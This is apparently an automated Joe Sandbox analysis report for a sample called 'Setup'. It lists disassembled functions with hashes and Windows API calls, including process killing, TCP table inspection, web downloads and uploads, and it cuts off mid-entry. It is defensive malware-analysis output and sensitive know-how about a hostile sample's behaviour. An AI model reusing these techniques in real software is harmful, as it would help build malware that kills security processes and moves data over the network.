Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction ID: 4bdcc19a583f6035f5e02198bbaf3320b2935e669f400ac949819ba26d034481
Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction Fuzzy Hash: 3441C574A00209EFDB04CF98C994BAEB7B1FF88315F248198E9156B384C771AE81CF94

Function 031C9590 Relevance: 3.5, APIs: 2, Instructions: 516libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 031D71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03235040), ref: 031D7297

Part of subcall function 031BB460: Concurrency::cancel_current_task.LIBCPMT ref: 031BB532

LoadLibraryA.KERNEL32 ref: 031C9786

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ByteCharConcurrency::cancel_current_taskLibraryLoadMultiWide
String ID:
API String ID: 1730022097-0
Opcode ID: cc8113d76ba26b2450ca4b68b6793f2f4ed777ad15037f696599f6649c1c8e18
Instruction ID: 6eb7df5364a58015c66be4510468109dcb7f40e180a6e984d897bc5b42234ce2
Opcode Fuzzy Hash: cc8113d76ba26b2450ca4b68b6793f2f4ed777ad15037f696599f6649c1c8e18
Instruction Fuzzy Hash: 09328A71D11268DFDB14DF64C944BEEBBB0AF5A304F1482C9E449BB281DBB06B84CB91

Function 031B2B60 Relevance: 1.9, APIs: 1, Instructions: 389COMMON

Download Yara Rule

APIs

Part of subcall function 031BB460: Concurrency::cancel_current_task.LIBCPMT ref: 031BB532

Part of subcall function 031D5070: SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?,03235040), ref: 031D50C2

GetFileAttributesA.KERNEL32 ref: 031B2E31

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: AttributesConcurrency::cancel_current_taskFileFolderPath
String ID:
API String ID: 325715954-0
Opcode ID: f3fd5cd265adff8ed184a3eca40f854e58b0ccfcff06ca8c1ce21897898ebe11
Instruction ID: 8b34021bc50de8a36f2f85347d77ba42108c6d2d5e1c2c58cdac52b66e34afba
Opcode Fuzzy Hash: f3fd5cd265adff8ed184a3eca40f854e58b0ccfcff06ca8c1ce21897898ebe11
Instruction Fuzzy Hash: F1126930D05398DBEB15DFA4C954BDEBBB0BF59304F2082CDD4492B292DBB11A89CB91

Function 031AE830 Relevance: 1.7, Strings: 1, Instructions: 448COMMON

Download Yara Rule

Strings

B, xrefs: 031B1F88

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Heap$FreeProcess
String ID: B
API String ID: 3859560861-1255198513
Opcode ID: 3a37db1dd189a1ec2aa10a78382860ff4c1647a724e065e244de3e221dab3fa1
Instruction ID: e8b2e4c5e289459f92ada04720e9971b2abe5d1438c834e60e15ba0befb31c06
Opcode Fuzzy Hash: 3a37db1dd189a1ec2aa10a78382860ff4c1647a724e065e244de3e221dab3fa1
Instruction Fuzzy Hash: 98126A34D1539CDFDB10EB68CD44BDDBBB1AF59304F1082D9D4496B292DBB01A88CB92

Function 03204F52 Relevance: 1.7, APIs: 1, Instructions: 156timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0320258E: RtlFreeHeap.NTDLL(00000000,00000000,?,0320A896,?,00000000,?,?,0320AB37,?,00000007,?,?,0320B0EC,?,?), ref: 032025A4
Part of subcall function 0320258E: GetLastError.KERNEL32(?,?,0320A896,?,00000000,?,?,0320AB37,?,00000007,?,?,0320B0EC,?,?), ref: 032025AF

GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,03205105,00000000,00000000,00000000), ref: 03204FC4

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3335090040-0
Opcode ID: 7712289d132e92b483b93b2921078e766dc0234d503444b28272995ccfeb16b4
Instruction ID: 97204dab272c08a6835ad0a337971f29b99e5774a4fd956eb08cb9d1cf532d5b
Opcode Fuzzy Hash: 7712289d132e92b483b93b2921078e766dc0234d503444b28272995ccfeb16b4
Instruction Fuzzy Hash: 9D411975910325AFCB10FFB5ED0894EBBB8EF06610B248165E554AB1D1EBB09A84CFD1

Function 031C9F30 Relevance: 1.6, APIs: 1, Instructions: 131nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 031D71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03235040), ref: 031D7297

Part of subcall function 031BB460: Concurrency::cancel_current_task.LIBCPMT ref: 031BB532

NtQuerySystemInformation.NTDLL(?,?,?,?,?,?,?,?,?,?,?,03226BE8,00000002), ref: 031CA08C

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ByteCharConcurrency::cancel_current_taskInformationMultiQuerySystemWide
String ID:
API String ID: 2924814847-0
Opcode ID: 6f5791dbb06cc3e1a40f01f7c2ebcfc0505285b464bcb1831e1bae6d5f5a4279
Instruction ID: d95ac0fd5702be12da62e0dbcf248f9820bd356244806376a3e391ae6d7dd5fc
Opcode Fuzzy Hash: 6f5791dbb06cc3e1a40f01f7c2ebcfc0505285b464bcb1831e1bae6d5f5a4279
Instruction Fuzzy Hash: A5519B70E14358DFDB10EFA4C9457EEBBB4BF49708F108299E405AB281DBB55A88CB91

Function 031C9D60 Relevance: 1.6, APIs: 1, Instructions: 128nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 031D71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03235040), ref: 031D7297

Part of subcall function 031BB460: Concurrency::cancel_current_task.LIBCPMT ref: 031BB532

NtQuerySystemInformation.NTDLL(?,?,?,?,?,?,?,?,?,?,?,03226BD8,00000002), ref: 031C9EA4

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ByteCharConcurrency::cancel_current_taskInformationMultiQuerySystemWide
String ID:
API String ID: 2924814847-0
Opcode ID: 5dca3baba5339bcd8e6b73dc9d33a00f35fafa06224278d5b7887feed6b3f27b
Instruction ID: 766645ca25c2beff17c7e6b4c47b4ddae6324289f95be56b81e3d34145d9305b
Opcode Fuzzy Hash: 5dca3baba5339bcd8e6b73dc9d33a00f35fafa06224278d5b7887feed6b3f27b
Instruction Fuzzy Hash: 21518B70E14358EFDB00EFA8C945BEEBBB4FF59708F204249E4017B281DBB55A858B91

Function 031A56C0 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ae700406261e1bf696825f1b1ee66a3f31c1cc60f644181963f5d3daafe0c6b
Instruction ID: cefdb0ac1806bfd2f8d84c24ce4d1576e16a3d02ffb2ce257db3555788974e9f
Opcode Fuzzy Hash: 9ae700406261e1bf696825f1b1ee66a3f31c1cc60f644181963f5d3daafe0c6b
Instruction Fuzzy Hash: 10F169B9608B408FD324CF29C84076BF7E6BF89215F044A2DE5EA87790E774E844CB52

Function 031D56C0 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97fff45c044fefec688ae29c6824a37ec8e2fd7139cb66c7d25eac30a51ab117
Instruction ID: 5ae3b19d64719a67196bc8a03dd72f4b3cd624ae30350387581f037184eb24d5
Opcode Fuzzy Hash: 97fff45c044fefec688ae29c6824a37ec8e2fd7139cb66c7d25eac30a51ab117
Instruction Fuzzy Hash: 71A1BD74D042998FDB09CFA8D8547EEFFB2AF5F210F188169D8A0AB342D3359545CBA0

Function 031AA8D0 Relevance: 24.3, APIs: 16, Instructions: 322
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004,03235040,00000000,00000010,?,?,03227A1C,?,03233654,03227A00,?,03233654,032279E8), ref: 031AA920
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,03227A1C,?,03233654,03227A00,?,03233654,032279E8,?,03233654,032279CC,?), ref: 031AA965
GetExtendedTcpTable.IPHLPAPI(00000000,?,00000000,00000002,00000000,00000000), ref: 031AA987
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,03227A1C,?,03233654,03227A00,?,03233654,032279E8,?,03233654,032279CC), ref: 031AA999
GetExtendedTcpTable.IPHLPAPI(00000000,00000000,00000000,00000002,00000000,00000000), ref: 031AA9C0
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,03227A1C,?,03233654,03227A00,?,03233654,032279E8,?), ref: 031AA9F3
StrStrA.SHLWAPI(00000000,03227934,00000010,?,?,03227A1C,?,03233654,03227A00,?,03233654,032279E8,?,03233654,032279CC,?), ref: 031AAA2B
StrStrA.SHLWAPI(-00000019,03227950,?,?,03227A1C,?,03233654,03227A00,?,03233654,032279E8,?,03233654,032279CC,?), ref: 031AAA44
StrStrA.SHLWAPI(-00000019,03227954,?,?,03227A1C,?,03233654,03227A00,?,03233654,032279E8,?,03233654,032279CC,?), ref: 031AAA5B
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,?,03227A1C,?,03233654,03227A00,?,03233654,032279E8,?), ref: 031AAA7A
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,03227A1C,?,03233654,03227A00,?,03233654,032279E8,?,03233654,032279CC), ref: 031AAA8D
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,?,?,?,?,03227A1C,?,03233654,03227A00,?), ref: 031AAABB
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,03227A1C,?,03233654,03227A00,?,03233654,032279E8,?), ref: 031AAACE
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,?,?,?,?,03227A1C,?,03233654,03227A00,?,03233654,032279E8), ref: 031AACBE
GetProcessHeap.KERNEL32(00000000,032279CC,?,?,03227A1C,?,03233654,03227A00,?,03233654,032279E8,?,03233654,032279CC,?), ref: 031AACC9
HeapFree.KERNEL32(00000000,?,?,03227A1C,?,03233654,03227A00,?,03233654,032279E8,?,03233654,032279CC,?), ref: 031AACD0

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Virtual$Free$Alloc$ByteCharExtendedHeapMultiTableWide$Process
String ID:
API String ID: 1791798720-0
Opcode ID: 34d503317abe2ad4783d50dd331f2d644f2bfc5d4aef277f1dde5096d63620e6
Instruction ID: 577e3081b34d4b346ac28d4d868b682b2a2f7319756883b49b2f69222f970e78
Opcode Fuzzy Hash: 34d503317abe2ad4783d50dd331f2d644f2bfc5d4aef277f1dde5096d63620e6
Instruction Fuzzy Hash: 49C1F574E44704ABEB10EFA8DE09BEDBBB4AF49704F248108F5117B2C1DBB59644CBA1

Function 031CF4C0 Relevance: 11.1, APIs: 2, Strings: 4, Instructions: 589
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 031CF2B0: __Xtime_get_ticks.LIBCPMT ref: 031CF2E2
Part of subcall function 031CF2B0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 031CF2F0

FindWindowA.USER32(032271B0,03226626), ref: 031CF996

Part of subcall function 031CDEB0: InternetOpenUrlA.WININET ref: 031CE086
Part of subcall function 031CDEB0: InternetReadFile.WININET ref: 031CE0EA
Part of subcall function 031CDEB0: InternetReadFile.WININET ref: 031CE136

RtlExitUserThread.NTDLL(00000000), ref: 031CFD6A

Part of subcall function 031B5030: Concurrency::cancel_current_task.LIBCPMT ref: 031B534B

Strings

1735337256, xrefs: 031CF500
., xrefs: 031CFD5B
https://, xrefs: 031CF707
https://, xrefs: 031CF5DA

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Internet$FileRead$Concurrency::cancel_current_taskExitFindOpenThreadUnothrow_t@std@@@UserWindowXtime_get_ticks__ehfuncinfo$??2@
String ID: .$1735337256$https://$https://
API String ID: 1741030633-3178887961
Opcode ID: e5dc02f3dc5aace03c0b5f928bd194470b7dcb464e1ead056ec48618f6d4f966
Instruction ID: 75667fe27949c443526e710ff5934ef1b9ee52a11d3272e9814b332696a95da0
Opcode Fuzzy Hash: e5dc02f3dc5aace03c0b5f928bd194470b7dcb464e1ead056ec48618f6d4f966
Instruction Fuzzy Hash: F732CF34D2539CAFDB01EBA8CC55BDEBB759F2A300F4040D8D4056B282DB742B49CBA2

Function 031A9500 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 254
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetWriteFile.WININET(00000000,?,?,?), ref: 031A96EB
InternetWriteFile.WININET(00000000,--------,0000000C,?), ref: 031A971B
OutputDebugStringA.KERNEL32(00000000,?,03235040,00000003,?), ref: 031A97B4

Strings

/?#, xrefs: 031A9373, 031A94A0
(, xrefs: 031A96BD
--------, xrefs: 031A970C, 031A9719

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: FileInternetWrite$DebugOutputString
String ID: --------$($/?#
API String ID: 2994765058-4100224915
Opcode ID: dde82cebacf2ab7a38ba6ce3c16ce2c6715140de9567a850f0419d7c3e9b738f
Instruction ID: 9ee14d0f68a233c4119041be03f166945ca2b5e7ebc7945dd8acc2689fe72fda
Opcode Fuzzy Hash: dde82cebacf2ab7a38ba6ce3c16ce2c6715140de9567a850f0419d7c3e9b738f
Instruction Fuzzy Hash: C1A1A8B5A0062D9FDB20DF54DD44FA9B7B8FF48710F0441A5E609A7284DB70AE84CFA8

Function 031F3472 Relevance: 9.3, APIs: 6, Instructions: 270
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__allrem.LIBCMT ref: 031F35FA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 031F3616
__allrem.LIBCMT ref: 031F362D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 031F364B
__allrem.LIBCMT ref: 031F3662
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 031F3680

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 5ed403bdb2a50c1951712f0982c6f736e4f74098a96fc3379f0e513d39c29211
Instruction ID: e1ff49583a072fca2aee087a783322d39ac927551d3fff68f5ae7db4dbc6e1a2
Opcode Fuzzy Hash: 5ed403bdb2a50c1951712f0982c6f736e4f74098a96fc3379f0e513d39c29211
Instruction Fuzzy Hash: 5781E979600B02AFD725EF39CC41B6BB3E9AF48764F184929E621DB7C0E770D6458B50

Function 031D5563 Relevance: 9.1, APIs: 6, Instructions: 89
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(00000001,00000000,?,?,?), ref: 031D5645
TerminateProcess.KERNEL32(00000000,00000000), ref: 031D5654
CloseHandle.KERNEL32(00000000), ref: 031D565B
Process32NextW.KERNEL32(?,?), ref: 031D566E
CloseHandle.KERNEL32(?), ref: 031D5688
Sleep.KERNEL32(000003E8), ref: 031D5693

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: CloseHandleProcess$NextOpenProcess32SleepTerminate
String ID:
API String ID: 2662874868-0
Opcode ID: dfe182011fb4508fbf5235256e0b38ec158e0fc22c9853b86aa63f0241914ddf
Instruction ID: bda1d25b7cbd17074cf06aae3e86d9257898b828da07e3263d67a714a6927642
Opcode Fuzzy Hash: dfe182011fb4508fbf5235256e0b38ec158e0fc22c9853b86aa63f0241914ddf
Instruction Fuzzy Hash: ED315E35904268DBDB21DF24DD4CBEEB7B6EF5A304F0982D9D80967180DB752A84CF90

Function 031DA54C Relevance: 7.6, APIs: 5, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 031DA553
std::_Lockit::_Lockit.LIBCPMT ref: 031DA55D
std::_Lockit::~_Lockit.LIBCPMT ref: 031DA604
Concurrency::cancel_current_task.LIBCPMT ref: 031DA60F
__EH_prolog3.LIBCMT ref: 031DA61C

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: H_prolog3Lockitstd::_$Concurrency::cancel_current_taskLockit::_Lockit::~_
String ID:
API String ID: 845066630-0
Opcode ID: 604c81b8c679708aa60156619670cf8fd3d8785ef9944d2b7fee02dddc7ec81e
Instruction ID: c58d2c04e40bcec9c4b1c003aa5d9bb2260d5b22fb77bef63b4c7089159c94ed
Opcode Fuzzy Hash: 604c81b8c679708aa60156619670cf8fd3d8785ef9944d2b7fee02dddc7ec81e
Instruction Fuzzy Hash: 33315A39A1061AAFCB04EF58D954AACB7B5FF09310F448459E925AB290CB70BA90CF90

Function 031D6680 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 328
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 031D6956
std::_Lockit::~_Lockit.LIBCPMT ref: 031D6985

Strings

.!, xrefs: 031D6934

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: .!
API String ID: 593203224-2740948462
Opcode ID: 58bf9927a1d67a1bb59d280f170c1db5385eb2de9f32eb25bc3add2f02d1c87a
Instruction ID: 5a22261bd3d65982bc286609e939a90ef91dde856e2c1d89ea29da856508436b
Opcode Fuzzy Hash: 58bf9927a1d67a1bb59d280f170c1db5385eb2de9f32eb25bc3add2f02d1c87a
Instruction Fuzzy Hash: E8D18CB5E00219DFDB14DFA8C984BAEFBB4FF49304F148119D805AB384DB75AA85CB80

Function 031E3DC2 Relevance: 4.9, APIs: 3, Instructions: 438COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031E3DC9
numpunct.LIBCPMT ref: 031E41AE

Part of subcall function 031E02A0: __EH_prolog3.LIBCMT ref: 031E02A7

Part of subcall function 031DFF85: __EH_prolog3.LIBCMT ref: 031DFF8C
Part of subcall function 031DFF85: std::_Lockit::_Lockit.LIBCPMT ref: 031DFF96
Part of subcall function 031DFF85: std::_Lockit::~_Lockit.LIBCPMT ref: 031E0007

Part of subcall function 031E00AF: __EH_prolog3.LIBCMT ref: 031E00B6
Part of subcall function 031E00AF: std::_Lockit::_Lockit.LIBCPMT ref: 031E00C0
Part of subcall function 031E00AF: std::_Lockit::~_Lockit.LIBCPMT ref: 031E0131

Part of subcall function 031DA54C: Concurrency::cancel_current_task.LIBCPMT ref: 031DA60F
Part of subcall function 031DA54C: __EH_prolog3.LIBCMT ref: 031DA61C

Part of subcall function 031DF34A: __EH_prolog3.LIBCMT ref: 031DF351
Part of subcall function 031DF34A: std::_Lockit::_Lockit.LIBCPMT ref: 031DF35B
Part of subcall function 031DF34A: std::_Lockit::~_Lockit.LIBCPMT ref: 031DF3CC

__Getcoll.LIBCPMT ref: 031E3F7E

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

Part of subcall function 031E34BB: __Getctype.LIBCPMT ref: 031E34CA

Part of subcall function 031DF75D: __EH_prolog3.LIBCMT ref: 031DF764
Part of subcall function 031DF75D: std::_Lockit::_Lockit.LIBCPMT ref: 031DF76E
Part of subcall function 031DF75D: std::_Lockit::~_Lockit.LIBCPMT ref: 031DF7DF

Part of subcall function 031DF887: __EH_prolog3.LIBCMT ref: 031DF88E
Part of subcall function 031DF887: std::_Lockit::_Lockit.LIBCPMT ref: 031DF898
Part of subcall function 031DF887: std::_Lockit::~_Lockit.LIBCPMT ref: 031DF909

Part of subcall function 031DFA46: __EH_prolog3.LIBCMT ref: 031DFA4D
Part of subcall function 031DFA46: std::_Lockit::_Lockit.LIBCPMT ref: 031DFA57
Part of subcall function 031DFA46: std::_Lockit::~_Lockit.LIBCPMT ref: 031DFAC8

Part of subcall function 031DF9B1: __EH_prolog3.LIBCMT ref: 031DF9B8
Part of subcall function 031DF9B1: std::_Lockit::_Lockit.LIBCPMT ref: 031DF9C2
Part of subcall function 031DF9B1: std::_Lockit::~_Lockit.LIBCPMT ref: 031DFA33

Part of subcall function 031DA54C: __EH_prolog3.LIBCMT ref: 031DA553
Part of subcall function 031DA54C: std::_Lockit::_Lockit.LIBCPMT ref: 031DA55D
Part of subcall function 031DA54C: std::_Lockit::~_Lockit.LIBCPMT ref: 031DA604

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Lockitstd::_$H_prolog3$Lockit::_Lockit::~_$Concurrency::cancel_current_taskGetcollGetctypenumpunct
String ID:
API String ID: 2694696949-0
Opcode ID: 737d4c4e56e198c63ff94a9ba53ab31455a52ff39f21699b49514218add57508
Instruction ID: 38a3c0662ebce4582ca94e453aa70444f84cab56e75963a09d5354009bf5a6e7
Opcode Fuzzy Hash: 737d4c4e56e198c63ff94a9ba53ab31455a52ff39f21699b49514218add57508
Instruction Fuzzy Hash: 3ED12B79D10B15ABDB25EFA64C006BFBAF8DF9E250F15481DE8155F280EF72858087E1

Function 031DCC05 Relevance: 4.6, APIs: 3, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

_Maklocstr.LIBCPMT ref: 031DCC41
_Maklocstr.LIBCPMT ref: 031DCC5A

Part of subcall function 031DCD89: Concurrency::cancel_current_task.LIBCPMT ref: 031DCE2B

_Maklocstr.LIBCPMT ref: 031DCC69

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Maklocstr$Concurrency::cancel_current_task
String ID:
API String ID: 980645097-0
Opcode ID: 81964f783b07abd66ca8ad895620ec947fc951b319a1cee6d8121c6c3ba484a7
Instruction ID: ebea8fd5b7f94b84c4770d16ac9b950d11888fd8cfb898881d9c23f856a5bc05
Opcode Fuzzy Hash: 81964f783b07abd66ca8ad895620ec947fc951b319a1cee6d8121c6c3ba484a7
Instruction Fuzzy Hash: 3D01847AD007087BDB10EFB5EC45C9FBBACEF89710B00482AF955AB240DB746901C6D0

Function 02DF25A5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,?,?), ref: 02DF2637

Strings

.dll, xrefs: 02DF25DC

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .dll
API String ID: 1029625771-2738580789
Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction ID: ea10bdd211387d86936cf55cb61915990263a20a128aa14a42fea989a1fd6e05
Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction Fuzzy Hash: FD2106326042C58FDB61CFA8D858B6A7BA4EF05324F0A406DDE01CBB41D730EC45C794

Function 0320258E Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,0320A896,?,00000000,?,?,0320AB37,?,00000007,?,?,0320B0EC,?,?), ref: 032025A4
GetLastError.KERNEL32(?,?,0320A896,?,00000000,?,?,0320AB37,?,00000007,?,?,0320B0EC,?,?), ref: 032025AF

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 1504e3e3fb67423b04680475ed0961dbc2cb6ee87a45c8f664f940b3298bd03a
Instruction ID: 2427aa488d10206a5e5670d4c17e4c68eafacd21543055d641fa6ee20e8bc2f6
Opcode Fuzzy Hash: 1504e3e3fb67423b04680475ed0961dbc2cb6ee87a45c8f664f940b3298bd03a
Instruction Fuzzy Hash: 74E08C36504314AFCB21BFA5B80CB9A7BACAB48391F148461FA089A1A0DF3486908794

Function 031D4EDC Relevance: 2.6, APIs: 2, Instructions: 129COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 031D4FF1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 031D5042

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 9704d15ce1ef225dc8ea093baea7ea3caaad11ef8b3f9ec4f86484666a0425d6
Instruction ID: de940cc7b69a9ecc8d9f2d7417aa894d58af766909aa6bfcc1846142856b3992
Opcode Fuzzy Hash: 9704d15ce1ef225dc8ea093baea7ea3caaad11ef8b3f9ec4f86484666a0425d6
Instruction Fuzzy Hash: B7517C70A00718EFDB24DFA8D854BADBBB6FF89304F14051DE416AF290DB756A48CB90

Function 03204CC0 Relevance: 1.9, APIs: 1, Instructions: 408timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,03205105,00000000,00000000,00000000), ref: 03204FC4

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 982f543ad7aaf041eb24f8a223efe8a7c6d4c2d53f490992c9641811b4ccf83e
Instruction ID: 4496be43b814be9b91d84062cffd0f42f3b7686416262d503cf08a8a5dc312b0
Opcode Fuzzy Hash: 982f543ad7aaf041eb24f8a223efe8a7c6d4c2d53f490992c9641811b4ccf83e
